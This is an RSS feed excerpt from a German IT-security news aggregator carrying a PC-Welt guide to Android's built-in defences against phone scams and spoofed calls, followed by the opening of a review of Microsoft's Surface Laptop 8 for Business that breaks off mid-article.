<link>https://tsecurity.de/de/3661208/it-security-nachrichten/so-clever-schuetzt-sie-android-vor-telefonbetrug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661208/it-security-nachrichten/so-clever-schuetzt-sie-android-vor-telefonbetrug/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.09.07.png?w=1024" alt="SPAM" class="wp-image-4195202" width="1024" height="553" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">wisely / Shutterstock.com</p></div>



<p>Ob der angebliche Bankmitarbeiter, der falsche Polizist oder der berüchtigte <a href="https://www.pcwelt.de/article/1204883/pc-welt-spricht-mit-enkeltrick-opfer-und-erklaert-wie-sie-ihre-liebsten-schuetzen.html" target="_blank">Enkeltrick</a>: Telefonbetrug (Vishing) hat sich zu einer regelrechten Epidemie entwickelt. Kriminelle nutzen manipulierte Rufnummern (Spoofing; lesen Sie hierzu unseren Ratgeber <a href="https://www.pcwelt.de/article/1202966/call-id-spoofing-so-schuetzen-sie-sich-vor-betruegerischen-anrufen.html" target="_blank">Call-ID Spoofing: So schützen Sie sich vor betrügerischen Anrufen)</a> und teils sogar <a href="https://www.pcwelt.de/article/2488661/experte-warnt-25-milliarden-gmail-nutzer-durch-neuen-ki-hack-bedroht.html" target="_blank">KI-generierte Stimmen,</a> um ihre Opfer unter Druck zu setzen – leider immer wieder mit Erfolg.</p>



<p>Doch jetzt die gute Nachricht: Die Tech-Konzerne rüsten auf und halten dagegen. Google hat tiefgreifende Schutzmechanismen in das Android-Betriebssystem integriert, die auch im Hintergrund den Kampf mit Betrügern aufnehmen.</p>



<p>Von der einfachen Spam-Warnung bis hin zur hochkomplexen Echtzeit-Analyse durch Künstliche Intelligenz – wir zeigen Ihnen, wie Ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank">Smartphone</a> Sie heute vor dem Schlimmsten bewahrt.</p>



<h2 class="wp-block-heading">Die 6 wichtigsten Schutz-Techniken im Detail</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.09.23.png?w=571" alt="Smarte Abwehr ab Werk" class="wp-image-4195203" width="571" height="1025" sizes="auto, (max-width: 571px) 100vw, 571px"><figcaption class="wp-element-caption">Smarte Abwehr ab Werk: Android erkennt Betrugsversuche inzwischen auch automatisch. Für viele Features benötigen Sie jedoch die offizielle Telefon-App von Google – die ist auf den meisten Geräten aber ohnehin Standard.</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">1. Scam Detection: Die KI hört mit und warnt in Echtzeit</h2>



<p>Eines der neuesten Features im Kampf gegen <a href="https://www.pcwelt.de/article/2161507/schutz-vor-paypal-betrug.html" target="_blank">Betrüger</a> ist die sogenannte <strong>Scam Detection</strong>. Die Funktion analysiert laufende Gespräche direkt auf dem Smartphone. Auf neueren Pixel-Geräten kommt dafür die On-Device-KI Gemini Nano zum Einsatz.</p>



<p>Erkennt das System typische Betrugsmuster – etwa wenn sich ein Anrufer als Bankmitarbeiter ausgibt und zu einer dringenden Überweisung, der Herausgabe von PINs oder der Installation einer Fernwartungs-App auffordert –, erscheint eine deutliche Warnung auf dem Bildschirm. Zusätzlich macht das Smartphone per Ton und Vibration auf den möglichen Betrugsversuch aufmerksam.</p>



<p>Die Analyse erfolgt vollständig lokal auf dem Gerät. Laut Google werden dabei weder Gesprächsaufzeichnungen noch Transkripte an Server übertragen.</p>



<h2 class="wp-block-heading">2. Fake Call Detection: Abwehr von KI-Stimmenklonen</h2>



<p>Ein besonders perfider Trend sind nach wie vor <a href="https://www.pcwelt.de/article/2793036/betrugsanrufe-auf-handy-festnetztelefon-ganz-einfach-stoppen-so-gehts-kostenlose-tipps.html" target="_blank">Schockanrufe</a>, bei denen Betrüger mittels KI-Deepfake die exakte Stimme eines Angehörigen nachahmen und per Rufnummern-Erkennung (Spoofing) sogar den Namen des Kontakts (z. B. „Mama“) auf Ihrem Display einblenden.</p>



<p>Hier greift die <strong>Fake Call Detection</strong>: Sobald der Anruf eingeht, baut Ihr Smartphone im Hintergrund über die verschlüsselte RCS-Technologie (Rich Communication Services) eine stille Verbindung zum echten Handy des angeblichen Absenders auf. Bei diesem digitalen Handschlag fragt das System an: „Rufst du mich gerade an?“ Meldet das andere Gerät ein „Nein“, entlarvt Android den Schwindel.</p>



<p><strong>Der Clou dabei:</strong> Ihr Smartphone radiert das gefälschte Kontaktbild sowie den Namen („Mama“) umgehend vom Display und kennzeichnet den Anrufer als „Unbekannt“. Gleichzeitig warnt das System visuell vor Identitätsbetrug und bietet den Auflegen-Button an. Damit das klappt, müssen beide Seiten die <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">offizielle Google Telefon-App</a> nutzen.</p>



<h2 class="wp-block-heading">3. Phone Call Spoofing Protection: „Verifizierte Finanzanrufe“</h2>



<p>Im Kampf gegen den weitverbreiteten <a href="https://www.pcwelt.de/article/3123388/erst-datenklau-dann-fake-anruf-polizei-warnt-bankkunden.html" target="_blank">Banking Scam</a> arbeitet Google direkt mit teilnehmenden Finanzinstituten zusammen. Die Funktion <strong>Verifizierte Finanzanrufe</strong> soll Android-Nutzer vor gefälschten Anrufen schützen, bei denen Betrüger die Telefonnummer einer Bank nachahmen.</p>



<p>Haben Sie die App einer teilnehmenden Bank (wie der Neobank Revolut) installiert, prüft das System im Hintergrund eingehende Anrufe solcher Nummern in Echtzeit.</p>



<p>Ist die App einer unterstützten Bank auf dem Smartphone installiert, kann Android eingehende Anrufe dieser Bank überprüfen. Dabei wird abgeglichen, ob der Anruf von der Bank autorisiert wurde.</p>



<p>Kann diese Echtheit nicht bestätigt werden oder stammt der Anruf von einer Rufnummer, die eigentlich nur für eingehende Kundenanrufe vorgesehen ist, warnt Android vor einem möglichen Spoofing-Versuch oder blockiert den Anruf. Nutzer erhalten anschließend einen entsprechenden Hinweis auf dem Display.</p>



<p>Zudem erkennt das System sogenannte <strong>Inbound-only-Nummern.</strong> Das sind Nummern der Bank, die ausschließlich für eingehende Kundenanrufe gedacht sind. Kommt von einer solchen Nummer ein Anruf rein, enttarnt Android das sofort als Spoofing und blockiert die Verbindung. Im Anschluss erhalten Sie eine Benachrichtigung auf dem Display.</p>



<p>Sie können übrigens schnell kontrollieren, ob die Funktion bei Ihnen aktiv ist. Der Pfad in den Einstellungen lautet:</p>



<p><em>Sicherheit &amp; Datenschutz</em> → <em>Mehr Sicherheit &amp; Datenschutz</em> →<em> Funktion „Verifizierte Finanzanrufe“</em>.</p>



<p><strong>Hinweis:</strong> Weil das Feature eine direkte Schnittstelle benötigt, wird Ihnen diese Option in den Android-Einstellungen erst dann angezeigt, wenn Sie eine unterstützte Banking-App auf Ihrem Smartphone installiert und eingerichtet haben. Leider gibt es für deutsche Kunden bisher noch nicht viele unterstützte <a href="https://www.pcwelt.de/article/2054935/multibanking-apps-test-vergleich.html" target="_blank">Banken-Apps</a>.</p>



<h2 class="wp-block-heading">4. Call Screening und Call Reason: Ihr digitaler Butler</h2>



<p>Eine weitere effektive Waffe gegen unbekannte Nummern ist das <strong>Call Screening</strong> (Anruf-Prüfung). Ruft eine unbekannte Nummer an, müssen Sie nicht selbst abheben. Stattdessen übernimmt Google als automatisierter Butler das Gespräch. Der Anrufer wird gebeten, seinen Namen und den Grund des Anrufs zu nennen.</p>



<p>Sie können währenddessen live auf Ihrer Anzeige mitlesen, was der Anrufer sagt, und per Knopfdruck entscheiden, ob Sie das Gespräch annehmen oder als Spam blockieren. Ergänzt wird das durch die Funktion <strong>Call Reason</strong>, bei der seriöse Unternehmen bereits vor dem Abheben digital den Grund des Anrufs übermitteln können.</p>



<p><strong>Warum habe ich das noch nie gesehen und wie aktiviere ich es?</strong></p>



<p>Das vollwertige Call Screening steht derzeit <strong>vor allem auf Google-Pixel-Smartphones</strong> zur Verfügung. Allerdings unterscheidet sich die deutsche Version stark vom vollautomatischen US-Vorbild. Hierzulande müssen Sie den Filter im Moment des Anrufs manuell per Knopfdruck aktivieren.</p>



<p><strong>So sieht es in der Praxis aus:</strong> In den Einstellungen der Google Telefon-App finden Sie den Menüpunkt <strong>Anruf-Filter</strong>. Dort können Sie vorab eine von zwei Stimmen für die Ansage auswählen. Wenn nun ein unbekannter Anruf eingeht, tippen Sie auf dem Display auf den Button <strong>Anruf prüfen</strong>. Erst dann legt das Pixel für Sie los, liest den Text vor und transkribiert die Antwort des Anrufers live auf den Bildschirm. Ein Großteil der Sprachverarbeitung erfolgt dabei direkt auf dem Gerät, wodurch die Funktion schnell reagiert und ohne Internetverbindung auskommen soll.</p>



<h2 class="wp-block-heading">5. Der Klassiker: Anrufer-ID und Spam-Schutz</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.09.30.png?w=444" alt="Anrufer-ID" class="wp-image-4195204" width="444" height="1025" sizes="auto, (max-width: 444px) 100vw, 444px"></figure><p class="imageCredit">Foundry</p></div>



<p>Schon seit einigen Android-Generationen ist der grundlegende Spam-Schutz in der Google Telefon-App der erste Schutzwall. Sobald ein Anruf eingeht, gleicht das System die Nummer umgehend mit einer von Google gepflegten Datenbank mit bekannten Spam- und Unternehmensnummern ab.</p>



<p>Ist die Nummer bereits negativ aufgefallen, wird der Anruf deutlich als Spam gekennzeichnet. Etwa durch ein leuchtendes Display oder Warnhinweise wie „Verdacht auf Spam“.</p>



<p>Sie können die App so konfigurieren, dass solche Anrufe direkt abgewiesen werden. Ergänzt wird das durch <strong>Verifizierte Anrufe</strong>, bei denen legitime Unternehmen mit offiziellem Firmenlogo eingeblendet werden können.</p>



<p><strong>Die Einschränkung für Deutschland:</strong> Die Technik funktioniert auch hierzulande, allerdings müssen sich Unternehmen dafür zunächst bei Google registrieren. In der Praxis wird die Funktion bislang primär von größeren Unternehmen genutzt.</p>



<h2 class="wp-block-heading">6. Flankenschutz: SMS-Spam-Filter gegen Phishing</h2>



<p>Weil viele Telefonbetrugsfälle mit einer vorbereitenden SMS beginnen (etwa gefälschten Paketbenachrichtigungen mit einem Link), hat Google die Nachrichten-App <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Google Messages</a> mit erweiterten Schutzfunktionen ausgestattet.</p>



<p>Die App nutzt automatisierte Filtermechanismen, um verdächtige Inhalte zu erkennen. Dazu gehören typische Phishing-Nachrichten, <a href="https://www.pcwelt.de/article/2189774/kryptowahrungen-und-wallets-schuetzen-vor-hackern-dieben-kriminellen.html" target="_blank">Krypto-Betrug</a>, gefälschte Paket- oder Gewinnspielmeldungen sowie bekannte Scam-Muster mit manipulierten Links.</p>



<p>Erkannte Nachrichten können automatisch in einen Spam- oder Schutzbereich verschoben oder entsprechend markiert werden. Ein Teil der Erkennung erfolgt dabei direkt auf dem Gerät, sodass keine vollständige Analyse über externe Server notwendig ist.</p>



<h2 class="wp-block-heading">Übersicht: Welche Schutztechnik gibt es für Ihr Smartphone?</h2>



<p>Die Verfügbarkeit dieser Funktionen hängt stark vom Smartphone-Hersteller und der installierten Android-Version ab. Google spendiert seine besten Features traditionell zuerst den hauseigenen <a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html">Pix</a><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank">e</a><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html">l</a>-Geräten. Samsung-Nutzer können die Google-Telefon-App jedoch in der Regel aus dem Play Store nachinstallieren, um kompatible Dienste freizuschalten.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Schutz-Technik</strong></td><td><strong>Funktionsweise</strong></td><td><strong>Android-Version</strong></td><td><strong>Verfügbarkeit / Geräte</strong></td></tr><tr><td><strong>Scam Detection</strong></td><td>KI-Echtzeitanalyse des Gesprächs auf Betrugsmuster (lokal auf dem Gerät via Gemini Nano).</td><td>Ab Android 16 (Erste Vorschau ab Android 15)</td><td>Zunächst exklusiv für Google Pixel (ab Pixel 6), Ausweitung auf weitere Hersteller geplant.</td></tr><tr><td><strong>Fake Call Detection</strong></td><td>Digitaler RCS-Handschlag zur Identitätsprüfung. Bei Betrug werden Name und Kontaktbild sofort gelöscht.</td><td>Ab Android 12</td><td>Zunächst für Google Pixel-Geräte ausgerollt. Später für alle Geräte mit der offiziellen „Phone by Google“-App.</td></tr><tr><td><strong>Spoofing Protection</strong> <em>(Verifizierte Finanzanrufe)</em></td><td>Automatisierter Abgleich mit installierten Banking-Apps (z. B. Revolut) sowie Blockade von reinen Inbound-Nummern.</td><td>Ab Android 11</td><td>Alle kompatiblen Android-Geräte mit aktivierten Partner-Finanz-Apps.</td></tr><tr><td><strong>Call Screening</strong></td><td>Google Assistant nimmt unbekannte Anrufe entgegen und transkribiert diese live.</td><td>Ab Android 10</td><td>Exklusiv für Google Pixel-Smartphones (sowie ausgewählte Motorola-Geräte).</td></tr><tr><td><strong>Anrufer-ID &amp; Spam</strong></td><td>Abgleich mit weltweiten Datenbanken; rotes Warn-Display bei Spam-Verdacht.</td><td>Ab Android 9</td><td>Alle Android-Geräte, sofern die offizielle Google Telefon-App als Standard gesetzt ist.</td></tr><tr><td><strong>SMS-Spam-Schutz</strong></td><td>Filtert Phishing-Links, Gewinnspiele und Krypto-Scams in einen separaten Ordner aus.</td><td>Ab Android 8</td><td>Alle Android-Geräte, sofern die offizielle Google Messages-App genutzt wird.</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Flankenschutz: So drehen Sie den Spieß um</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.09.41.png?w=1024" alt="Spam-Nummern" class="wp-image-4195205" width="1024" height="851" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><strong>Ist auf Ihrer Seite:</strong> Die Bundesnetzagentur bietet spezielle Online-Formulare, mit denen Sie hartnäckige Spam-Nummern melden können.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Bis die neuesten KI-Features flächendeckend auf jedem Smartphone landen, müssen Sie nicht tatenlos abwarten. Mit einfachen Kniffen verpassen Sie Ihrem Android-Handy sofort ein Sicherheits-Upgrade:</p>



<ul class="wp-block-list">
<li><strong>Der proaktive Nummern-Schwindel:</strong> Betrüger können Sie nur anrufen, wenn sie Ihre Nummer haben. Wenn Sie bei Online-Gewinnspielen, Foren oder unübersichtlichen Webshops eine Telefonnummer angeben müssen, können Sie den kostenlosen Service „<a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Frank geht ran</a>“ nutzen (eine Initiative des Vereins <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Digitalcourage</a>). Geben Sie dazu einfach die Fake-Nummer <strong>0163 1737743</strong> an. Ruft dort ein Scammer oder Werbe-Bot an, übernimmt ein digitaler Anrufbeantworter und würgt das Gespräch freundlich, aber bestimmt ab.</li>



<li><strong>Konsequentes Melden:</strong> Ist doch noch ein Betrüger zu Ihnen durchgekommen? Ein langer Druck auf den Eintrag in Ihrer Anrufliste reicht, um die Nummer lokal zu blockieren und bei Google als Spam zu melden. Wer der Allgemeinheit helfen will, meldet hartnäckige Rufnummern über die <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Online-Formulare der Bundesnetzagentur</a>, um solchen Gaunern offiziell die Leitung kappen zu lassen.</li>
</ul>



<h2 class="wp-block-heading">Extra Schutzschild: Die besten Anti-Scam-Apps</h2>



<p>Wer seinen Schutz gezielt erweitern möchte – besonders auf Smartphones, die Googles hauseigene Bordmittel nicht voll unterstützen –, findet im Play Store starke Alternativen. Diese Apps gleichen eingehende Anrufe mit umfangreichen Datenbanken und Cloud-gestützten Listen ab:</p>



<ul class="wp-block-list">
<li><strong>Clever Dialer:</strong> Eine in Deutschland vielgenutzte Lösung mit Fokus auf Datenschutz. Das Tool erkennt lokale Kostenfallen erstaunlich zuverlässig, nutzt europäische Server und funktioniert, ohne dass das eigene Adressbuch zwingend hochgeladen werden muss. <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Zur App im Play Store</a>.</li>



<li><strong>Truecaller:</strong> Der internationale Platzhirsch. Bietet dank mehrerer Millionen Nutzer weltweit eine blitzschnelle Warnungen vor neuen Betrugsmaschen. <strong>Beachten Sie aber:</strong> Die App erfordert weitreichende Datenfreigaben. <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Zur App im Playstore</a>.</li>



<li><strong>tellows:</strong> Die Community-Lösung. Nutzer bewerten Nummern mit einem “tellows Score” nach Gefahrenpotenzial (z.B. “Gewinnspiel” oder “Ping-Anruf”). Zudem lassen sich ganze Vorwahlbereiche (z.B. aus dem Ausland) pauschal blockieren. <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Zur App im Play Store</a>.</li>
</ul>



<p><strong>Wichtig:</strong> Diese Apps benötigen Systemrechte (wie den Zugriff auf Ihre Kontakte und die Erlaubnis, die Telefon-App zu überlagern), um im Ernstfall warnen zu können. Laden Sie solche Tools deshalb <strong>ausnahmslos aus dem offiziellen <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Google Play Store</a></strong> herunter.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Wer ein <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank">aktuelles Android-Smartphone</a> besitzt, ist Betrügern nicht mehr schutzlos ausgeliefert. Besonders Nutzer der <a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html#" target="_blank">Google Pixel</a>-Reihe profitieren von einem starken, modernen Schutzschild aus On-Device-KI und cleveren Werkzeugen wie der <strong>Fake Call Detection</strong> oder dem <strong>Call Screening</strong> per Knopfdruck.</p>



<p>Damit die empfohlenen Drittanbieter-Apps im Ernstfall rechtzeitig warnen können, müssen Sie diesen bei der Einrichtung die nötigen Systemrechte gewähren – Googles eigene Bordmittel bringen diese Berechtigungen als System-Apps meist schon ab Werk mit.</p>



<p>Doch auch auf allen anderen Android-Handys lassen sich Risiken deutlich minimieren, indem man konsequent auf die offiziellen Telefon- und Messages-Apps von Google setzt und dort die Spam-Filter aktiviert.</p>



<p>(<a href="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html" data-type="link" data-id="https://www.pcwelt.de/article/3165851/android-telefonbetrug-schutztechniken-pixel-call-screening.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surface Laptop 8 for Business im Test: Ein Laptop von gestern zum Preis von morgen]]></title>
<description><![CDATA[Mark Hachman / Foundry



Auf einen Blick



Pro




Altbekannter Surface Laptop



Der neue Blickschutz funktioniert oft gut



Die “Voice Focus”-Funktion ist ziemlich nützlich




Kontra




Unangemessen hoher Preis



Die gleiche alte Bauweise




Fazit



Der Surface Laptop 8 for Business von...]]></description>
<link>https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.02.20.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195198" width="1024" height="645" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Altbekannter Surface Laptop</li>



<li>Der neue Blickschutz funktioniert oft gut</li>



<li>Die “Voice Focus”-Funktion ist ziemlich nützlich</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Unangemessen hoher Preis</li>



<li>Die gleiche alte Bauweise</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p>Der Surface Laptop 8 for Business von Microsoft kommt einem sofort bekannt vor. Herzstück ist ein leistungsstarker Intel Core Ultra Series 300 (Panther Lake)-Prozessor. Doch leider ist das Gerät derart teuer, dass sich ein Kauf angesichts der wenigen neuen Funktionen kaum rechtfertigen lässt.</p>



<p>Zum ersten Mal seit Jahren war ich nicht begeistert, ein neues Surface-Modell zu testen. Und auch nach dem ausführlichen Test bin ich eher enttäuscht.</p>



<p>Dabei hat der Surface Laptop 8th Edition (oder Surface Laptop 8) for Business zwei echte Pluspunkte vorzuweisen: ein Upgrade auf Intels hervorragende Prozessoren der Core Ultra 300-Serie (Panther Lake) und einen einigermaßen nützlichen Sichtschutz.</p>



<p>Letzterer kann den Bildschirm auf Knopfdruck abdunkeln und unkenntlich machen. Leider hat Microsoft aber am traditionellen Aufschlag für Surface-Geräte festgehalten. Diese Preisgestaltung treibt die Kosten des Laptops in unattraktive Höhen.</p>



<p>Fairerweise muss man sagen, dass es sich hierbei um einen Laptop der Business-Klasse handelt. Eine Consumer-Version dieses Surface Laptops wird noch in diesem Jahr folgen, ausgestattet mit einem Qualcomm Snapdragon X2 Elite Extreme-Chip.</p>



<p>Basierend auf meinen eigenen Tests beider Chips lässt sich sagen, dass der hier verbaute Intel Core Ultra 300-Prozessor den Snapdragon leicht übertreffen wird. Dies gilt zumindest für die Grafikleistung und möglicherweise auch für die Akkulaufzeit.</p>



<p>Einige Surface-Fans könnten einwenden, dass Microsoft das Design des Laptops bereits optimiert hat. Andere könnten die Optik als altbacken kritisieren. Ich gehöre definitiv zur zweiten Gruppe. Ich muss mittlerweile auf Klebezettel zurückgreifen, die ich an der Unterseite der von mir getesteten Surface-Laptops anbringe. Warum? Sie sind im Alltag sonst praktisch nicht voneinander zu unterscheiden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.55.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195215" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Modell-Chaos</h2>



<p>Der Microsoft Surface Laptop 8 ist mit Bildschirmdiagonalen von 13,8 Zoll und 15 Zoll erhältlich. Microsoft vertreibt das Modell offiziell als “Surface Laptop for Business (8. Generation)” oder “Surface Laptop 8 for Business”.</p>



<p>Sie können den Surface Laptop for Business auch mit einem 13-Zoll-Display kaufen. Microsoft hat den Surface Laptop bisher noch nie mit einer solchen Bildschirmgröße angeboten, weshalb er schlicht als <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Surface Laptop for Business 13 Zoll</a> bezeichnet wird.</p>



<p>Durch den Kauf des kleineren Surface Laptops sparen Sie mehrere hundert Euro (die Preise beginnen bei 1.549 Euro, im Vergleich zu 2.119 Euro für den 13,8-Zoll-Surface Laptop 8). Die Auswahl der Komponenten beschränkt sich dann jedoch auf einen Core Ultra 5 325-Prozessor, bis zu 24 Gigabyte RAM und bis zu einem Terabyte SSD-Speicher.</p>



<p>Auf dem Papier und in der Hand ist der Surface Laptop 8 for Business im Wesentlichen identisch mit dem <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> aus dem Jahr 2024, der ab 1.199 Euro angeboten wurde. Zugegeben, dabei handelte es sich um eine Consumer-Version des Surface Laptop mit einem Snapdragon X1 Elite. Das ändert jedoch nichts daran, dass sich der Einstiegspreis im Vergleich zu vor zwei Jahren fast verdoppelt hat. Das macht das neue Gerät deutlich unattraktiver.</p>



<h2 class="wp-block-heading">Kombination aus Alt und Neu</h2>



<p>Das Design des Surface Laptop hat sich seit Jahren kaum verändert. Direkt nach dem Auspacken liegt der Laptop angenehm in der Hand, während das glänzende Aluminiumgehäuse nun aus bis zu 64 Prozent recyceltem Material besteht. Da es jedoch leicht Fingerabdrücke anzieht, sollten Sie ein Mikrofasertuch immer griffbereit halten. Ich empfinde das Gewicht von 1,35 Kilogramm weder in der Hand noch in meinem Rucksack als unangenehm. Hier kann ich Entwarnung geben.</p>



<p>In einigen Aspekten unterscheidet sich der Surface Laptop 8 for Business von seinen Vorgängern. Da wäre zunächst der Prozessor: eine Leistungssteigerung durch den <a href="https://www.pcwelt.de/article/3025897/intel-core-ultra-series-3-laptop-chips.html" target="_blank">Intel Core Ultra Series 3-Chip</a>, bekannt als Panther Lake.</p>



<p>Zu den verfügbaren Ausführungen gehören sowohl die Basis-Konfigurationen mit Core Ultra 5 und 7 als auch der Core Ultra X7 368, der über Intels leistungsstarke integrierte GPU verfügt. Lassen Sie sich davon jedoch nicht allzu sehr verunsichern. Bei längerem Betrieb wird die Grafikeinheit durch die begrenzte Kühlung im Laptop thermisch erheblich gedrosselt.</p>



<p>Zudem gibt es eine merkwürdige Auslassung: Die Surface-App, mit der sich die Ladeoptionen des Akkus sowie einige weitere Einstellungen verwalten lassen, fehlt. Ich musste sie von Hand <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">aus dem Microsoft Store herunterladen</a>.</p>



<p>Außerdem bietet Microsoft als Option die “Privacy Screen”-Technologie an, die exklusiv für die 13,8-Zoll-Version verfügbar ist.</p>



<p>Im Wesentlichen funktioniert die “Privacy Screen”-Technologie des Surface Laptops, ähnlich wie die “Privacy Display” getaufte Funktion auf dem neuen <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank">Galaxy S26 Ultra</a> von Samsung.</p>



<p>Sie wird über eine neue Taste auf der Tastatur aktiviert, die als F1-Taste neben der Esc-Taste in der obersten Reihe angeordnet ist. Drückt man diese Taste, wird das Display dunkler und passt sich so an, dass es von den Seiten her schwerer lesbar ist. Microsoft erklärt <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">an dieser Stelle</a>, wie der Blickschutz funktioniert, ohne dabei die genaue Funktionsweise zu erläutern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.59.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195220" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Die Datenschutztechnologie nutzt die Fähigkeit des Laptops, die Helligkeit des Displays sowohl entsprechend den Präferenzen des Benutzers als auch in Abhängigkeit vom Umgebungslicht anzupassen. Je dunkler das Display, desto schwieriger wird es für neugierige Passanten, etwas auf dem Bildschirm zu erkennen.</p>



<p>In meinen Tests waren die Ergebnisse nicht eindeutig. In einem abgedunkelten Raum, wurde das Display aus einer Entfernung von einem Meter ab einem seitlichen Winkel von etwa 15 Grad zur Displayachse so dunkel, dass es fast nicht mehr zu erkennen war.</p>



<p>In einem helleren Raum blieb ein größerer Teil des Bildschirminhalts erkennbar. Ich konnte jedoch immer gut erkennen, um welche Art von Inhalt es sich auf dem Bildschirm handelte, auch wenn ich den eigentlichen Text nicht mehr lesen konnte. Ein Teil des Bildschirms blieb immer relativ gut sichtbar, es sei denn, ich saß sehr weit entfernt.</p>



<p>Es ist schwer zu beurteilen, wie effektiv der Blickschutz wirklich ist. Die Wirksamkeit schwankte im selben Raum unter den gleichen Bedingungen einfach zu sehr. Schauen Sie sich einfach mal die folgenden Vergleiche an. Im ersten Beispiel musste ich die Perspektive leicht verändern.</p>



